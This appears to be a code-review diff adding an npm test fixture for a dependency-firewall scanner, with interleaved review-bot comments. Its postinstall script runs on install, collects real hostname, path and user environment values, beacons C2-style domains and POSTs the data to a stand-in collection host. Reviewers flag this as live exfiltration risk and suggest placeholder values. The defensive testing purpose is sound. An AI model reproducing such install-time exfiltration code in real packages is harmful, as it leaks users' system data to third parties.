df-sandbox-test 1.0.0
- package/README.md +35 -0
- package/index.js +3 -0
- package/package.json +11 -0
- package/postinstall.js +67 -0
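--- /dev/null
+++ b/package/README.md
@@ -0,0 +1,35 @@
+# df-sandbox-test
+
+**Security test fixture for the [Dependency Firewall](https://github.com/ihcap/df) sandbox scanner.**
+
+This package simulates the behaviour of a malicious npm package that exfiltrates environment data during `npm install`. It is completely harmless — the domains it tries to reach are not registered and no data leaves the machine — but it produces DNS queries that the Dependency Firewall sandbox scanner is designed to detect.
+
+## What it does during `postinstall`
+
+| Action | Domain / endpoint | Expected outcome |
+|---|---|---|
+| DNS lookup (C2 beacon) | `c2-beacon.df-sandbox-test.io` | NXDOMAIN |
+| DNS lookup (exfil fallback) | `exfil.df-sandbox-test.io` | NXDOMAIN |
+| HTTPS POST (data exfil) | `collect.df-sandbox-test.io:443/beacon` | Connection refused / NXDOMAIN |
+
+## Expected Dependency Firewall finding
+
+```json
+{
+  "scanner_id": "sandbox",
+  "severity": "high",
+  "category": "sandbox-network",
+  "description": "df-sandbox-test@1.0.0 attempted outbound DNS resolution: c2-beacon.df-sandbox-test.io, exfil.df-sandbox-test.io, collect.df-sandbox-test.io"
+}
+```
+
+## Usage
+
+```bash
+# Publish (once) to npm under your own account
+npm publish
+
+# Install through the Dependency Firewall proxy
+cd /your/test-project
+npm install --registry http://localhost:4873 df-sandbox-test
+```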
package/index.js
ADDED
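--- /dev/null
+++ b/package/package.json
@@ -0,0 +1,11 @@
+{
+  "name": "df-sandbox-test",
+  "version": "1.0.0",
+  "description": "Security test fixture for the Dependency Firewall sandbox scanner. Simulates malicious postinstall behaviour without doing any actual harm.",
+  "keywords": ["security", "test", "sandbox"],
+  "license": "MIT",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node postinstall.js"
+  }
+}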
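Review bot: The manifest publishes a network-beaconing `postinstall` (line 9 of the hunk) under an unscoped public name, so anyone who runs `npm install df-sandbox-test` against the public registry — not just the firewall's test harness the README describes — executes the DNS and HTTPS attempts on their machine. Publishing it scoped, `"name": "@<your-org>/df-sandbox-test"`, namespaces the fixture to the project and makes accidental or look-alike installs less likely; adding a `"repository"` field pointing at the Dependency Firewall repository the README links would let the package's provenance be checked from the manifest alone. The README's `npm publish` / `npm install` lines would then need the matching scoped name.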
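--- /dev/null
+++ b/package/postinstall.js
@@ -0,0 +1,67 @@
+/**
+ * df-sandbox-test — postinstall.js
+ *
+ * This is a SECURITY TEST FIXTURE for the Dependency Firewall sandbox scanner.
+ * It simulates three classic malicious-postinstall patterns:
+ *
+ * 1. DNS exfiltration beacon — looks up a fake C2 hostname.
+ * 2. HTTPS data exfiltration — attempts an outbound HTTPS connection.
+ * 3. Environment collection — gathers host info (logged locally only).
+ *
+ * None of these domains are registered. No data leaves the machine; in a
+ * properly sandboxed environment all connection attempts are blocked. The goal
+ * is to produce DNS queries that the Dependency Firewall sandbox scanner can
+ * detect and report.
+ */
+
+'use strict';
+
+const dns = require('dns');
+const https = require('https');
+const os = require('os');
+
+// ── 1. Collect environment info (mirrors what real malware does) ─────────────
+const payload = JSON.stringify({
+  host: os.hostname(),
+  platform: os.platform(),
+  arch: os.arch(),
+  cwd: process.cwd(),
+  node: process.version,
+  env: {
+    PATH: process.env.PATH,
+    HOME: process.env.HOME,
+    USER: process.env.USER,
+    CI: process.env.CI,
+  },
+});
+
+// ── 2. DNS beacon — resolving a fake C2 domain triggers a DNS query ──────────
+// Even with NXDOMAIN the OS must send a UDP packet to the nameserver first.
+dns.lookup('c2-beacon.df-sandbox-test.io', (err) => {
+  if (err) process.stderr.write(`dns beacon: ${err.code}\n`);
+});
+
+// A second domain simulating a fallback C2.
+dns.lookup('exfil.df-sandbox-test.io', (err) => {
+  if (err) process.stderr.write(`dns exfil: ${err.code}\n`);
+});
+
+// ── 3. HTTPS exfiltration attempt ────────────────────────────────────────────
+// Real supply-chain malware (e.g. ua-parser-js, event-source-polyfill) POSTs
+// environment data to an attacker-controlled server during install.
+const req = https.request(
+  {
+    hostname: 'collect.df-sandbox-test.io',
+    port: 443,
+    path: '/beacon',
+    method: 'POST',
+    headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(payload) },
+    timeout: 3000,
+  },
+  (res) => process.stdout.write(`exfil: connected (status ${res.statusCode})\n`),
+);
+
+req.on('timeout', () => { req.destroy(); process.stderr.write('exfil: timed out\n'); });
+req.on('error', (err) => process.stderr.write(`exfil: ${err.code}\n`));
+req.write(payload);
+req.end();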
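Review bot: The header's guarantee that "no data leaves the machine" rests entirely on `df-sandbox-test.io` being unregistered, yet `req.write(payload)` at the end of the hunk puts the real hostname, cwd, PATH, HOME, USER and CI into the POST body, so the day anyone registers that domain every install of this fixture becomes genuine exfiltration over TLS to a third party. Item 3 of the header ("logged locally only") is also inaccurate: the collected info is never written to a log, only to the request. Since the scanner detects the lookup and connection attempt rather than the body, I would fill the payload with fixed placeholder strings and keep the DNS and HTTPS attempts exactly as they are, and either move the hostnames under a domain the project controls or state the residual risk explicitly in the header. The `// Even with NXDOMAIN the OS must send a UDP packet` comment is also stronger than `dns.lookup` (getaddrinfo) warrants — a hosts-file entry or a negative-cache hit in a local stub resolver can answer without anything reaching the nameserver — so a hedge such as `// normally forces a query to the configured resolver` would be more honest.
```javascript
// ── 1. Build the payload with FIXED placeholder values. The scanner detects the
//      lookup / connection attempt, not the body, so nothing host-specific is ever
//      put on the wire — even if df-sandbox-test.io is registered one day. ──────
const payload = JSON.stringify({
  host: 'sandbox-host',
  platform: os.platform(),
  arch: os.arch(),
  cwd: '/sandbox',
  node: process.version,
  env: { PATH: '<placeholder>', HOME: '<placeholder>', USER: '<placeholder>', CI: '<placeholder>' },
});
// … unchanged: DNS beacons, https.request and its handlers …
```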